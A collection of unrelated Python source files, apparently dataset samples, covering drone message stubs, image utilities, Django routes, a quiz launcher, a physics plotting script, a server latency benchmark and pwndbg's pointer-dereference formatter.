    "INSAttitudeData", "INSConfigMsg", "INSCorrectionData",
    "INSCorrectionRequest", "INSEnums", "INSErrorData", "INSLog",
    "INSMessageComponents", "INSPosVelData", "INSStatusData", "KillMode",
    "LaneSplitter", "LaneSplitterStatsMsg", "LogInformationEntry",
    "LogManagement", "LogRequestMsg", "MPUCalConfig", "MRAirframeConfig",
    "MagCalibrationParameters", "MagData", "MagDataRaw",
    "MagOrientationConfigMsg", "Maneuver", "ManeuverExecutionStatus",
    "ManeuverPauseResumeMsg", "MapRcInputToFlightChannelMsg", "Menagerie",
    "MfgParamsMsg", "Mission", "MissionExec", "MissionList", "MissionStatus",
    "ModemConfig", "ModemGetRadioType", "ModemLinkStatus", "ModemPower",
    "NakMsg", "OperatorModuleConfig", "PWMRateMsg", "PayloadPower",
    "PosVelCtrlConfig", "PowerManagerConfig", "PowerStatus", "PressureData",
    "PrimaryControlMix", "PrimitiveDataTypes", "RcChannels",
    "RcInputCalibrationMsg", "RcInputMsg", "RebootRequestMsg", "RgbLed",
    "STM32OTPParams", "SaveConfigConstants", "ServerResponse", "Shape2D",
    "SimConfigurationRequest", "SimControlRequest", "StateMachineEnums",
    "SystemEnums", "SystemMode", "SystemPowerStatus",
    "TelemetryWatchdogConfig", "TemperatureData", "TestMessage",
    "ThreadStatsMsg", "TimeStamp", "VehicleDescriptionMessage",
    "VersionInfoEntry",
]
for _header in _PB_HEADERS:
    stub.include( "systemMessages/" + _header + ".pb.h" )

stub.newline()
stub.addLine( "typedef int16_t msgSize_t;" )
stub.newline()

# Generate one stub per system message class, in the original order.
_SYS_MSG_CLASSES = [
    "CAGLMsg", "CAGLOffsetMsg", "CAGLRawMsg", "CAccelGyroDataMsg",
    "CAccelGyroDataRaw", "CActiveControlSourceNotification",
    "CActiveManeuverSourceNotification", "CActuatorPictureMsg",
    "CActuatorPortCalibration", "CActuatorPortConfigMsg",
    "CActuatorPowerBusMsg", "CActuatorTakePictureMsg",
    "CAirmailDebugLogSettingsMsg", "CAirmailPoolStatsMsg",
    "CAirspeedCalibrationDataMsg", "CAltMSLCorrection", "CAnnounceMsg",
    "CAttCtrlConfig", "CAuxControlMix", "CAwxHeaderMsg", "CBoardStatus",
    "CClientRequest", "CRegisterAsPeriodicPublisherMsg",
    "CUnregisterAsPublisherMsg", "CSubscribePeriodicMsg",
    "CUnsubscribeTopicMsg", "CRegisterAsCallerMsg", "CUnregisterAsCallerMsg",
    "CRegisterAsProviderMsg", "CUnregisterAsProviderMsg", "CCallServiceMsg",
    "CPublishTopicMsg", "CClientServiceResponseMsg", "CConnectionStatus",
    "CContingencyEventMap", "CContingencyEventStatus", "CControlLog",
    "CControlLogRateConfig", "CControlRequest",
    "CDateOfLastConfigurationMsg", "CSignatureIdMsg", "CServiceInfoMsg",
    "CProviderIdMsg", "CSignatureHashMsg", "CSignatureHashAndProviderMsg",
    "CQueryResultMsg", "CUniqueIdMsg", "CNodeInfoMsg", "CNodeIdAckMsg",
    "CNodeIdMsg", "CNodeIdListMsg", "CNodeInfoFilterMsg", "CEffectorCmdsMsg",
    "CEffectorStatusMsg", "CEffectorSurfaceMap", "CEthernetPortStatusMsg",
    "CEthernetStatusMsg", "CListFilesRequest", "CFileInfo",
    "CListFilesResponse", "CFileTransferMsg", "CFlightStatus",
    "CGCSConnectivityStatus", "CGCSJobInfoMsg", "CGPSData", "CGPSRestartMsg",
    "CGPSStatus", "CGeofence", "CGuidanceConfig", "CHealthEventMsg",
    "CHobbsMeterMsg", "CIMUOrientationConfig", "CINSAncillaryData",
    "CINSAttitudeData", "CINSConfigMsg", "CINSCorrectionData",
    "CINSCorrectionRequest", "CINSErrorData", "CINSLog", "CVectorXYZ",
    "CVectorNED", "CDCM", "CINSPosVelData", "CINSStatusData", "CKillCh",
    "CKillModeMsg", "CLaneSplitterStatsMsg", "CLogEntryProvider",
    "CLogMgmtCmd", "CLogMgmtResponse", "CLogRequestMsg", "CMPUCalConfig",
    "CMRAirframeConfig", "CMagCalibrationParameters", "CMagData",
    "CMagDataRaw", "CMagOrientationConfigMsg", "CManeuver",
    "CManeuverExecutionStatus", "CManeuverPauseResumeMsg",
    "CMapRcInputToFlightChannelMsg", "CpointType", "CMR_FLT_trackToPt",
    "CMR_FLT_holdAtPt", "CMR_FLT_manAttitude", "CMR_FLT_manVelocity",
    "CMR_TKO_liftoffMSL", "CMR_LND_descendMSL", "CMR_FLT_stopAndHold",
    "CMR_LND_stopAndDescend", "CMR_LND_attitudeOnly", "CMR_FLT_minAltGoto",
    "CMR_FLT_photoSurvey", "CMR_FLT_surveyPoint", "CLND_terminate",
    "CFW_FLT_manAttitude", "CFW_FLT_manFull", "CFW_FLT_circle",
    "CFW_FLT_slantTrackTo", "CFW_FLT_directTo", "CFW_TKO_launch",
    "CFW_LND_touchdown", "CFW_LND_glidingCircle", "CFW_LND_attitudeOnly",
    "CFW_FLT_photoSurvey", "CMfgParamsMsg", "CMission", "CMissionExec",
    "CMissionList", "CMissionStatus", "CRadioConfigMsg",
    "CRadioConfigOOBMsg", "CRadioTypeMsg", "CradioLinkStatusMsg",
    "CradioPowerMsg", "CNakMsg", "COperatorModuleConfig", "CPWMRateMsg",
    "CPayloadPowerMsg", "CPosVelCtrlConfig", "CPowerManagerConfig",
    "CCircuitState", "CPowerStatusMsg", "CPressureData",
    "CPrimaryControlMix", "CBoolMsg", "CSint32Msg", "CUint32Msg",
    "CFloatMsg", "CRcInputCalibrationMsg", "CRcInputMsg",
    "CRebootRequestMsg", "CRgbLedMsg", "CSaveConfigMsg", "CServerResponse",
    "CTopicDataMsg", "CServiceCallResultMsg", "CServiceCallRequestMsg",
    "CServiceCallRegistrationAck", "CAcknowledgementMsg", "CintPointType",
    "CCircleType", "CPolygonType", "CShape2D", "CSimConfigurationRequest",
    "CSimControlRequestMsg", "CSystemMode", "CSystemPowerStatusMsg",
    "CTelemetryWatchdogConfig", "CTemperatureData", "CTestMessage",
    "CThreadStatsMsg", "CTimeStamp", "CVehicleDescriptionMessage",
    "CVersionEntry", "CVersionMsg",
]
for _cls in _SYS_MSG_CLASSES:
    stub.stubSysMsg( _cls )
|
import scipy.misc, numpy as np, os, sys
def save_img(out_path, img):
    """Clamp *img* to the valid 8-bit range and write it to *out_path*."""
    clipped = np.clip(img, 0, 255).astype(np.uint8)
    scipy.misc.imsave(out_path, clipped)
def scale_img(style_path, style_scale):
    """Load the image at *style_path*, rescaled by the factor *style_scale*.

    :returns: ndarray with both spatial dimensions multiplied by
        ``style_scale`` (channel count unchanged)
    """
    scale = float(style_scale)
    # (A duplicate `scale = float(style_scale)` line was removed.)
    o0, o1, o2 = scipy.misc.imread(style_path, mode='RGB').shape
    new_shape = (int(o0 * scale), int(o1 * scale), o2)
    # Was `_get_img`, a NameError: the loader defined in this module is get_img.
    style_target = get_img(style_path, img_size=new_shape)
    return style_target
def get_img(src, img_size=False):
    """Read *src* as an RGB ndarray, optionally resized to *img_size*.

    Grayscale inputs are stacked into three identical channels.
    """
    img = scipy.misc.imread(src, mode='RGB') # misc.imresize(, (256, 256, 3))
    grayscale = len(img.shape) != 3 or img.shape[2] != 3
    if grayscale:
        img = np.dstack((img, img, img))
    if img_size != False:
        img = scipy.misc.imresize(img, img_size)
    return img
def exists(p, msg):
    # Assert that path p exists, failing with msg (raises AssertionError).
    assert os.path.exists(p), msg
def list_files(in_path):
    """Return the file names in the top level of *in_path* (no recursion)."""
    try:
        _, _, filenames = next(os.walk(in_path))
    except StopIteration:
        # Path missing/unreadable: os.walk yields nothing, so no files —
        # same as the original loop that never executed.
        return []
    return list(filenames)
|
from datetime import datetime
import hashlib
from extractor import Ways
from date import way_date
class Helpers:
    '''Small static utilities shared by the way* classes.'''
    @staticmethod
    def make_id(website, timestamp):
        '''MD5 hex digest of the website string concatenated with the timestamp.'''
        digest = hashlib.md5()
        digest.update((website + timestamp).encode())
        return digest.hexdigest()
class WayDefault:
    '''A single archived snapshot of a website, parsed on construction.'''
    @classmethod
    def set_parser(cls, ParserObj):
        '''Install the page parser used by every instance of this class.'''
        cls.parser = ParserObj
    def __init__(self, snap_dict):
        '''Parse snap_dict['page'] and record id/timestamp/report metadata.'''
        self._raw = snap_dict
        self.timestamp = snap_dict['timestamp']
        parsed = self.parser.parse(self._raw['page'])
        parsed['website'] = snap_dict['website']
        parsed['timestamp'] = way_date(self.timestamp)
        self._data = parsed
        self.id = Helpers.make_id(snap_dict['website'], self.timestamp)
        self.report = snap_dict['report']
    @property
    def extracted(self):
        '''Parsed fields without the raw page text.'''
        return {key: value for key, value in self._data.items() if key != 'page'}
    @property
    def snapshot(self):
        '''The raw page text of this snapshot.'''
        return self._data['page']
    @property
    def data(self):
        '''All parsed fields, including the raw page.'''
        return self._data
WayDefault.set_parser(Ways)
|
from django.conf.urls import url
from . import views
# URL routes for the quiz app: index, a quiz detail page, and a question page.
# Slugs accept letters, digits, hyphens and underscores.
urlpatterns = [
    url(r'^$', views.index, name='index'),
    url(r'^(?P<quiz_slug>[-A-Za-z0-9_]+)/$', views.quiz, name='quiz'),
    url(r'^(?P<quiz_slug>[-A-Za-z0-9_]+)/(?P<question_slug>[-A-Za-z0-9_]+)/$', views.question, name='question')
]
|
import sys # this allows you to read the user input from keyboard also called "stdin"
import classOne # This imports all the classOne functions
import classTwo # This imports all the classTwo functions
import classThree # This imports all the classThree functions
import classFour # This imports all the classFour functions
TIMEOUT = 10  # seconds allowed for answering each question
MAX_CLASS = 5  # highest class (grade) for which a quiz is offered
QUIZ_INSTRUCTIONS = """
Get ready for the quiz. You will have 10 questions out of which you
will need 8 right to win the prize. You will have """ + str(TIMEOUT) + """ seconds
to answer each question.Press Enter to start."""
def getUsersClass(): #main
    """Prompt for and read the user's class (grade) from stdin.

    Returns the class as an int when it is between 1 and MAX_CLASS
    (inclusive); returns False for out-of-range or non-numeric input.
    """
    print("Please tell me which Class you are in? ")
    try:
        usersClass = int(sys.stdin.readline().strip())
    except ValueError:
        # Narrowed from a bare `except:` so Ctrl-C / SystemExit still
        # propagate; only non-numeric input is treated as a retry.
        print("Exception")
        return False
    if usersClass < 1 or usersClass > MAX_CLASS:
        print("No Quiz available for Class " + str(usersClass))
        return False
    return usersClass
if __name__ == '__main__':
    # Keep prompting until a valid class number (1..MAX_CLASS) is entered.
    while(True) :
        usersClass = getUsersClass()
        if (usersClass != False) :
            break
    print(QUIZ_INSTRUCTIONS)
    # Wait for the user to press Enter before starting the quiz.
    sys.stdin.readline()
    # Dispatch to the quiz module matching the user's class.
    if (usersClass == 1) :
        classOne.classOneQuiz()
    elif (usersClass == 2) :
        classTwo.classTwoQuiz()
    elif(usersClass == 3):
        classThree.classThreeQuiz()
    elif(usersClass == 4):
        classFour.classFourQuiz()
    # NOTE(review): MAX_CLASS is 5 but there is no branch for class 5 --
    # a class-5 user sees the instructions and then the program exits.
    # Confirm whether a classFive module is missing or MAX_CLASS should be 4.
|
import numpy
from srxraylib.plot.gol import plot_image, plot
import sys
from comsyl.scripts.CompactAFReader import CompactAFReader
def plot_stack(mystack, what="intensity", title0="X", title1="Y", title2="Z"):
    """Show a 3D complex stack in a silx StackView, rendering one component.

    `what` selects the transformation applied to the complex data:
    intensity, real, imaginary, phase, or phase_deg.
    """
    from silx.gui.plot.StackView import StackViewMainWindow
    from silx.gui import qt
    app = qt.QApplication(sys.argv[1:])
    viewer = StackViewMainWindow()
    viewer.setColormap("jet", autoscale=True)
    # Map each label onto the transformation applied to the complex data.
    transforms = {
        "intensity": numpy.absolute,
        "real": numpy.real,
        "imaginary": numpy.imag,
        "phase": numpy.angle,
        "phase_deg": lambda a: numpy.angle(a, deg=True),
    }
    if what not in transforms:
        raise Exception("Undefined label " + what)
    viewer.setStack(transforms[what](mystack))
    viewer.setLabels([title0, title1, title2])
    viewer.show()
    app.exec_()
def load_stack(filename):
    """Load a COMSYL CompactAFReader file; return (x, y, stack, eigenvalues).

    The stack is a complex array of shape (n_modes, ny, nx) holding each
    mode transposed onto (y, x) axes; eigenvalues holds the occupation of
    each mode.
    """
    reader = CompactAFReader(filename)
    print("File %s:" % filename)
    print("contains")
    print("%i modes" % reader.number_modes())
    print("on the grid")
    print("x: from %e to %e" % (reader.x_coordinates().min(), reader.x_coordinates().max()))
    print("y: from %e to %e" % (reader.y_coordinates().min(), reader.y_coordinates().max()))
    print("calculated at %f eV" % reader.photon_energy())
    print("with total intensity in (maybe improper) normalization: %e" % reader.total_intensity().real.sum())
    print("Occupation and max abs value of the mode")
    x_axis = reader.x_coordinates()
    y_axis = reader.y_coordinates()
    n_modes = reader.number_modes()
    occupations = numpy.zeros(n_modes)
    stack = numpy.zeros((n_modes, y_axis.size, x_axis.size), dtype=complex)
    for index in range(n_modes):
        occupations[index] = reader.occupation(index)
        stack[index, :, :] = reader.mode(index).T
    return x_axis, y_axis, stack, occupations
if __name__ == "__main__":
    # Hard-coded input file from a specific COMSYL calculation run.
    h,v,mystack, occupation = load_stack("/users/srio/OASYS_VE/comsyl_srio/calculations/new_u18_2m_1h_s2.5")
    # NOTE(review): titles say "um" while coordinates are multiplied by 1e3;
    # if x/y are in metres that factor yields mm, not um -- confirm units.
    plot_stack(mystack,what="intensity", title0="Mode index",
               title1="V from %3.2f to %3.2f um"%(1e3*v.min(),1e3*v.max()),
               title2="H from %3.2f to %3.2f um"%(1e3*h.min(),1e3*h.max()))
    # Plot the occupation (eigenvalue) of each mode against its index.
    plot(numpy.arange(occupation.size),occupation)
|
from django.conf.urls import url,include
from django.contrib import admin
from cn_device import views
# Routes: the admin site plus the device "send"/"give" endpoints, each keyed
# by a numeric id; `bl` is a single 0/1 flag.
# NOTE(review): presumably id_ras identifies a device -- confirm against views.
urlpatterns = [
    url(r'^admin/', admin.site.urls),
    url(r'^send/(?P<id_ras>[0-9]+)/$',views.payam,name='send condition'),
    url(r'^give/(?P<id_ras>[0-9]+)/(?P<bl>[0-1])/$', views.give_req, name='give condition'),
]
|
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
    """Enforce that ('owner', 'name') pairs are unique on the core 'test' model."""
    dependencies = [
        ('core', '0008_auto_20150819_0050'),
    ]
    operations = [
        migrations.AlterUniqueTogether(
            name='test',
            unique_together=set([('owner', 'name')]),
        ),
    ]
|
"""
Run latency & thruput tests on various server configurations.
"""
import glob
import os.path
import shutil
import time
from openmdao.main.mp_util import read_server_config
from openmdao.main.objserverfactory import connect, start_server
from openmdao.util.fileutil import onerror
MESSAGE_DATA = []  # test payload strings of geometrically increasing size
def init_messages():
    """Populate MESSAGE_DATA with blank payloads from 1 byte up to 1 MiB (2**20)."""
    MESSAGE_DATA.extend(' ' * (1 << i) for i in range(21))
def run_test(name, server):
    """ Run latency & bandwidth test on `server`.

    Returns a list of (size, latency, thruput) tuples, one per entry in
    MESSAGE_DATA. (`name` is accepted but unused here.)
    Note: this file uses Python 2 print-statement syntax.
    """
    for i in range(10):
        server.echo(MESSAGE_DATA[0]) # 'prime' the connection.
    results = []
    reps = 1000
    for msg in MESSAGE_DATA:
        start = time.time()
        for i in range(reps):
            server.echo(msg)
        et = time.time() - start
        size = len(msg)
        latency = et / reps
        thruput = len(msg) / (et / reps)
        print '%d msgs of %d bytes, latency %g, thruput %g' \
              % (reps, size, latency, thruput)
        results.append((size, latency, thruput))
        # Shrink the repetition count once a size takes over ~2 seconds so
        # each (larger) message size costs roughly comparable wall time.
        if et > 2 and reps >= 20:
            reps /= int((et / 2) + 0.5)
    return results
def main():
    """ Run latency & thruput tests on various server configurations.

    Iterates over 8 configurations (encrypted/unencrypted transport x two
    port modes x 1 or 2 hops), runs run_test() against each, and writes
    the collected numbers to latency.csv and thruput.csv.
    """
    init_messages()
    latency_results = {}
    thruput_results = {}
    # For each configuration...
    count = 0
    for authkey in ('PublicKey', 'UnEncrypted'):
        # NOTE(review): the meaning of port=-1 vs port=0 is defined by
        # start_server -- confirm which is 'default' vs 'OS-assigned'.
        for ip_port in (-1, 0):
            for hops in (1, 2):
                # Start factory in unique directory.
                count += 1
                name = 'Echo_%d' % count
                if os.path.exists(name):
                    shutil.rmtree(name, onerror=onerror)
                os.mkdir(name)
                os.chdir(name)
                try:
                    server_proc, server_cfg = \
                        start_server(authkey=authkey, port=ip_port)
                    cfg = read_server_config(server_cfg)
                finally:
                    # Always restore the working directory, even on failure.
                    os.chdir('..')
                # Connect to factory.
                address = cfg['address']
                port = cfg['port']
                key = cfg['key']
                print
                print '%s, %s %d, hops: %d' % (authkey, address, port, hops)
                factory = connect(address, port, authkey=authkey, pubkey=key)
                if hops == 1:
                    server = factory
                else:
                    # Create a server.
                    server = factory.create('')
                # Run test.
                results = run_test(name, server)
                # Shutdown.
                if server is not factory:
                    factory.release(server)
                factory.cleanup()
                server_proc.terminate(timeout=10)
                # Add results.
                for size, latency, thruput in results:
                    if size not in latency_results:
                        latency_results[size] = []
                    latency_results[size].append(latency)
                    if size not in thruput_results:
                        thruput_results[size] = []
                    thruput_results[size].append(thruput)
    # Write out results in X, Y1, Y2, ... format.
    # Column order matches the nesting of the configuration loops above.
    header = 'Bytes,En-S-1,En-S-2,En-P-1,En-P-2,Un-S-1,Un-S-2,Un-P-1,Un-P-2\n'
    with open('latency.csv', 'w') as out:
        out.write(header)
        for size in sorted(latency_results.keys()):
            out.write('%d' % size)
            for value in latency_results[size]:
                out.write(', %g' % value)
            out.write('\n')
    with open('thruput.csv', 'w') as out:
        out.write(header)
        for size in sorted(thruput_results.keys()):
            out.write('%d' % size)
            for value in thruput_results[size]:
                out.write(', %g' % value)
            out.write('\n')
    # Remove the per-configuration scratch directories.
    for path in glob.glob('Echo_*'):
        shutil.rmtree(path, onerror=onerror)
|
import gdb
import pwndbg.abi
import pwndbg.color.chain as C
import pwndbg.color.memory as M
import pwndbg.color.theme as theme
import pwndbg.enhance
import pwndbg.memory
import pwndbg.symbol
import pwndbg.typeinfo
import pwndbg.vmmap
LIMIT = pwndbg.config.Parameter('dereference-limit', 5, 'max number of pointers to dereference in a chain')
def get(address, limit=LIMIT, offset=0, hard_stop=None, hard_end=0, include_start=True):
    """
    Recursively dereferences an address. For bare metal, it will stop when the address is not in any of vmmap pages to avoid redundant dereference.
    Arguments:
        address(int): the first address to begin dereferencing
        limit(int): number of valid pointers
        offset(int): offset into the address to get the next pointer
        hard_stop(int): address to stop at
        hard_end: value to append when hard_stop is reached
        include_start(bool): whether to include starting address or not
    Returns:
        A list representing pointers of each ```address``` and reference
    """
    limit = int(limit)
    result = [address] if include_start else []
    for i in range(limit):
        # Don't follow cycles, except to stop at the second occurrence.
        if result.count(address) >= 2:
            break
        if hard_stop is not None and address == hard_stop:
            result.append(hard_end)
            break
        try:
            address = address + offset
            # Avoid redundant dereferences in bare metal mode by checking
            # if address is in any of vmmap pages
            if not pwndbg.abi.linux and not pwndbg.vmmap.find(address):
                break
            # Read the pointer-sized value at `address` and mask it to the
            # architecture's pointer width.
            address = int(pwndbg.memory.poi(pwndbg.typeinfo.ppvoid, address))
            address &= pwndbg.arch.ptrmask
            result.append(address)
        except gdb.MemoryError:
            # Unreadable memory cleanly terminates the chain.
            break
    return result
# Configurable glyphs used by format() when rendering a dereference chain.
config_arrow_left = theme.Parameter('chain-arrow-left', '◂—', 'left arrow of chain formatting')
config_arrow_right = theme.Parameter('chain-arrow-right', '—▸', 'right arrow of chain formatting')
config_contiguous = theme.Parameter('chain-contiguous-marker', '...', 'contiguous marker of chain formatting')
def format(value, limit=LIMIT, code=True, offset=0, hard_stop=None, hard_end=0):
    """
    Recursively dereferences an address into string representation, or convert the list representation
    of address dereferences into string representation.
    Arguments:
        value(int|list): Either the starting address to be sent to get, or the result of get (a list)
        limit(int): Number of valid pointers
        code(bool): Hint that indicates the value may be an instruction
        offset(int): Offset into the address to get the next pointer
        hard_stop(int): Value to stop on
        hard_end: Value to append when hard_stop is reached: null, value of hard stop, a string.
    Returns:
        A string representing pointers of each address and reference
        Strings format: 0x0804a10 —▸ 0x08061000 ◂— 0x41414141
    """
    limit = int(limit)
    # Allow results from get function to be passed to format
    if isinstance(value, list):
        chain = value
    else:
        chain = get(value, limit, offset, hard_stop, hard_end)
    arrow_left = C.arrow(' %s ' % config_arrow_left)
    arrow_right = C.arrow(' %s ' % config_arrow_right)
    # Colorize the chain
    rest = []
    for link in chain:
        symbol = pwndbg.symbol.get(link) or None
        if symbol:
            # Show both the raw address and its resolved symbol name.
            symbol = '%#x (%s)' % (link, symbol)
        rest.append(M.get(link, symbol))
    # If the dereference limit is zero, skip any enhancements.
    if limit == 0:
        return rest[0]
    # Otherwise replace last element with the enhanced information.
    rest = rest[:-1]
    # Enhance the last entry
    # If there are no pointers (e.g. eax = 0x41414141), then enhance
    # the only element there is.
    if len(chain) == 1:
        enhanced = pwndbg.enhance.enhance(chain[-1], code=code)
    # Otherwise, the last element in the chain is the non-pointer value.
    # We want to enhance the last pointer value. If an offset was used
    # chain failed at that offset, so display that offset.
    elif len(chain) < limit + 1:
        enhanced = pwndbg.enhance.enhance(chain[-2] + offset, code=code)
    else:
        # Chain hit the dereference limit: mark it as continuing ("...").
        enhanced = C.contiguous('%s' % config_contiguous)
    if len(chain) == 1:
        return enhanced
    return arrow_right.join(rest) + arrow_left + enhanced
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.